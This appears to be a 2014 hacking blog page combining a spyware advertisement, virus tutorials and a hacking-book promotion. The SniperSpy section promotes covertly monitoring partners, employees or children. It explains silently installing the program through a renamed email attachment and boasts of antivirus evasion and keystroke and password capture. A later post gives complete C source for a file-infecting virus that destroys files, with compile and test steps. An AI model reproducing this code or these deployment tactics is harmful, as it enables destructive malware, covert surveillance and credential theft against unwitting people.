Monday 7 July 2014

How to Monitor a Remote Computer

Sometimes, it becomes necessary for us to monitor a remote computer in oder to keep track of the ongoing activities on it. This may be for several reasons such as to monitor an employee, catch a cheating partner or for the parents to monitor the activities of their children during their absence.
To do this, all you need is a powerful Monitoring Software installed on your computer. However, the story doesn’t end-up here itself because there exists tons of such monitoring software programs out there on the market each having different features and prices. Many of them are no more than a crap, some are overpriced while only a few are really worth buying.
In this post, I will give you a detailed information on how to monitor a remote computer and also tell you about which monitoring software to go for, how it works, how to install and use it, their pros and cons and many more.

Which Monitoring Software to Choose?

In my experience of over 10 years in the field of information security, I have tried and tested a number of monitoring programs for my clients and personal use. SniperSpy was the only program that grabbed my attention. The following review shows why I was really impressed by SniperSpy:

SniperSpy: A Detailed Review

Monitor remote computer using SniperSpySniperSpy is a cutting-edge Remote Spying Solution from Retina-X Studios LLC, that comes with a Remote-Install feature! That means, you can now install this software even on a remote computer without the need to have physical access to it. Currently, only a few monitoring programs on the market support this feature and SniperSpy is the best among them.
This is the only monitoring software on the market with a secure control panel. You can remotely view everything your child, employee or spouse does on their computer.

SniperSpy Software Features:

  • Supports Remote Install and Remote Monitoring – No physical access to the target computer is required! Also works on a local computer.
  • 100% Undetectable! Operates in a total stealth mode.
  • Completely Bypasses any firewall, even the Windows XP, Vista, 7 and 8 firewalls!

With SniperSpy, you can monitor all the activities of the remote computer:

  • Actual Screenshots: Captures a full-sized screenshot of the target computer.
  • Websites Visited: Capture a complete log of URLs visited from any browser including IE, Firefox, Chrome and others.
  • Keystrokes in Many Languages: You can capture every keystroke of the target computer including passwords, IM/chat logs etc. not only in English, but also in several other languages.
  • Full Chat Conversations: Records both sides of chats / IMs in Google Talk, Yahoo IM, Windows Live and more.

Watch the Screen LIVE like a TV and perform the following actions:

  • Reboot/Shutdown/Logoff: You have the option to remotely issue a shutdown/reboot or logoff command.
  • Remote Uninstall: You also have the option to remotely uninstall the software at anytime from your own computer.

How it Works?

How the Monitoring Process Works?

How to Install and Monitor the Remote Computer?

The software can be installed by sending an email attachment which contains the installation module. When the target user opens the attachment, the software gets silently installed and the monitoring process will begin.
Deployment is not normally a problem because the small (81kb) module file can be renamed to anything you want and dropped inside a Word, Image or Zip file and sent through many regular email services. This makes the remote installation very easy and stealth. However, if you need to install it on your local computer, you can do so normally just like you install any other program.
When you want to view the screen or browse the logged results, simply log in to the “Secure Online Control Panel” (from any browser – IE, Firefox, Chrome etc.) and enter your username and password. This panel allows you to view the screen, perform commands, search the logs or uninstall the software.
You will get a complete step-by-step instruction and technical support after you purchase the software.

Supported Operating Systems:

Windows 2000/XP/Vista/7/8.  Also supports Mac.

FAQs about SniperSpy:

1. Will SniperSpy collect any personal information about me?
No, SniperSpy is completely safe. It neither collects any information about you nor try to contact you in any way.
2. Will SniperSpy be detected by virus scanners?
No, SniperSpy is intelligently designed to escape from the modern antivirus software. Even if it is found to be detected, an immediate update is released so as to solve this problem. You will also get technical support on all the 7 days to help solve your problems if any.
Download SniperSpy Now! – for Windows and Mac
For a complete review of monitoring software products visit www.iwebguard.com.

How to Create a Computer Virus?

This program is an example of how to create a computer virus in C language. This program demonstrates a simple virus program which when executed creates a copy of itself in all the other files that are present in the same directory.
Thus, it destroys other files by infecting them. The infected file will also become a virus so that when executed, it is capable of spreading the infection to another file and so on.
Here’s the source code of the virus program:
#include<stdio.h>
#include<io.h>
#include<dos.h>
#include<dir.h>
#include<conio.h>
#include<time.h>
FILE *virus,*host;
int done,a=0;
unsigned long x;
char buff[2048];
struct ffblk ffblk;
clock_t st,end;
void main()
{
st=clock();
clrscr();
done=findfirst(“*.*”,&ffblk,0); //Search for a file with any extension (*.*)
while(!done)
{
virus=fopen(_argv[0],”rb”);
host=fopen(ffblk.ff_name,”rb+”);
if(host==NULL) goto next;
x=89088;
printf(“Infecting %s\n”,ffblk.ff_name,a);
while(x>2048)
{
fread(buff,2048,1,virus);
fwrite(buff,2048,1,host);
x-=2048;
}
fread(buff,x,1,virus);
fwrite(buff,x,1,host);
a++;
next:
{
fcloseall();
done=findnext(&ffblk);
}
}
printf(“DONE! (Total Files Infected= %d)”,a);
end=clock();
printf(“TIME TAKEN=%f SEC\n”,
(end-st)/CLK_TCK);
getch();
}
This virus is designed to infect all types of files with any extension.
You can download the source code from the following link:

How the Virus Program Works?

The algorithm of this virus program is as follows:
Step-1: Search for files in the current directory. If one or more file is present, load the first file (target file).
Step-2: Load the copy of the virus itself onto the memory.
Step-3: Open the target file. Copy the virus code from the memory and place it in the target file. Close the target file when the copying process is completed.
Step-4: Load the next file to infect and move to the step-3. If all the files are infected, close all the open files, unload them from the memory and exit.
As far as the technical terms are concerned, I would not be able to explain the program line by line. Anyone with a working knowledge of C should be easily able to understand the functions and other terms used in the program.

How to Compile the Program:

For a step-by-step guide, you can refer my detailed post on how to compile C programs?

How to Test the Virus After the Compilation:

  1. Create a new empty folder.
  2. Put some executable files (or any other files) in the folder.
  3. Run the PC_Virus.exe file. With in a few seconds all the other files in the folder gets infected.
  4. Now every infected file is a new virus which is ready to re-infect. You can copy any of the infected .exe file to another empty folder and repeat the same procedure to see if the infected file is capable of re-infecting. Delete the folder and all the infected files after the testing process is done.
NOTE: The files infected by this virus are destroyed completely and cannot be recovered. So, always test the virus in a new folder by placing some sample files.
WARNING: FOR EDUCATIONAL PURPOSES ONLY. DO NOT SPREAD OR MISUSE THIS VIRUS CODE.

How to Create a Virus to Block Websites

Most of us are familiar with the virus that used to block Orkut and Youtube websites. If you are curious about creating such a virus on your own, here is how it can be done.
As usual I am using my favorite programming language ‘C’ to create this website blocking virus. I will give a brief introduction about this virus before I jump into the technical jargon.
This virus has been exclusively created in ‘C’. So, anyone with a basic knowledge of ‘C’ will be able to understand the working of this virus program. When this program is executed, it will block all those websites that are listed in the source code. In the following example, the sites that are listed in the source code are Google, Yahoo and Youtube. When you download the source code of this program, you have a choice to include your own list of sites that you want this virus to block.
I have just removed the source code of this program from this post as it is lengthy and makes the post look messy. You can still download the source code of this virus program from the following link:

How Virus Program Works?

The Windows operating system maintains a special file called HOSTS which can be used to block any given hostname or domain name (website) by adding new entries onto it. This program works by modifying the HOSTS file by adding new entries of those sites that are intended to be blocked. The HOSTS file is located at:
%windir%\system32\drivers\etc (Usually: C:\windows\system32\drivers\etc)
So, when you execute this program, all it does is add the entries of the list of those sites (mentioned in the source code) to this HOSTS file. Once this is done, the site will be blocked from your computer. So, none of the browsers would be able to load those sites on your computer.
For more information on HOSTS file, I recommend reading my other post on How to use HOSTS file to block websites.
Now, as far as the technical part of this program is concerned, people who have a working knowledge of ‘C’ should be easily able to understand the working of this virus program. However, for those who are new to ‘C’ programming, here is the algorithm of this program:
  • Determine the Root drive. ie: Find the drive (C:, D:, E: or F:) on which the Windows is installed.
  • Navigate to: %windir%\system32\drivers\etc
  • Open/Load the HOSTS file.
  • Copy a list of those websites that are mentioned in the ARRAY to the END of the file.
  • Save the file and Exit.

How to Compile the Source Code?

For a step-by-step compilation guide, refer my post: How to compile C Programs?

Testing the Virus:

  1. To test, run the compiled module. It will block the sites that are listed in the source code.
  2. Once you run the file block_Site.exe, restart your browser program. Then, type the URL of the blocked site and you’ll see the browser showing error “Page cannot displayed“.
  3. To remove the virus type the following command in the Run.
    %windir%\system32\drivers\etc
  4. There, open the file named “hosts” using the notepad. At the bottom of the opened file you’ll see something like this:
    127.0.0.1 google.com
  5. Delete all such entries which contain the names of blocked sites.

How to Become a Hacker (Very Important Article By Srikanth Ramesh)

Most of us are very curious to learn Hacking and want to become a Hacker, but don’t know where to start. If you are in a similar situation, then this article will most likely guide you to reach your goal.
On a regular basis, I get a lot of emails where people ask me “How to Become a Hacker”. In fact, this question is not an easy one to answer, since hacking is not an art that can be mastered overnight. It requires knowledge, skills, creativity, dedication and of course the TIME. Everyone can become a hacker provided they learn it from the basics. So, if you wanna become a hacker, then all you need is a good source of knowledge that will guide you through various concepts of hacking from the basics.

What Skills do I Need to Become a Hacker?

In simple words, there is no magic to become a  Hacker. But, like anything else that is worthwhile, it takes dedication and willingness to learn. It is most important to have a basic knowledge of the topics such as operating system basics and it’s working, computer networks, computer security and of course programming. However, you need not be the expert in each or any of those topics mentioned. As you gain the basic knowledge of various branches of computer, you can choose any one as your favorite and advance in it.

What is the Best Way to Become a Hacker?

As said earlier, the best way to become a hacker is to start from the basics. You will have to master the basics to build a strong foundation. And once this is done, you’ll be in a position to explore new ideas and start thinking like a Hacker.
There exists tons of books on the market that will teach you hacking, but unfortunately, it requires a set of pre-established skills and knowledge to understand the concepts explained in those books. Also, most of them are not suitable for the beginners who doesn’t know anything about hacking.
Anyhow, I have found an excellent Book for the Beginners that will teach you hacking from the basics. This book is the first step to fulfil your dream of becoming a hacker. When I first read this book, I myself was surprised at how simple and easy it was laid out. I decided to introduce this book for all those enthusiasts as it can be the right source for the beginners who are interested to learn hacking from the basics. The good thing about this book is that, any one can understand the concepts presented here, without the need for any prior knowledge. This book is called:
Hacker's Underground Handbook
Learn Hacking
This book will take you from the core to the top. It will tell you how to hack in simple steps. Everything in this book is presented in a simple and effective manner. It is a great source for the beginner who would like to become a hacker. This will install a Hacker’s Mindset on you.
The following skills are uncovered in this book:
You will learn all the hacker underground tricks and learn to apply them in real world situations.
  1. You will be put into a hacker mindset so that you will learn to think like a Hacker.
  2. By learning how a hacker thinks and acts, you will be able to protect yourself from future hack attacks.
  3. You will acquire knowledge nonexistent to 99.9% of the people in the world!
  4. This underground handbook may get you interested in pursuing a career as an Ethical Hacker.
  5. This book is of great value for all those who have a dream to become a Hacker.
So what are you waiting for? Go grab your copy now from the following link:

Wait… This is not the end. Rather it is just the beginning of your journey. To become a hacker, all you need is dedication and hard work. I wish you all the best for your future success.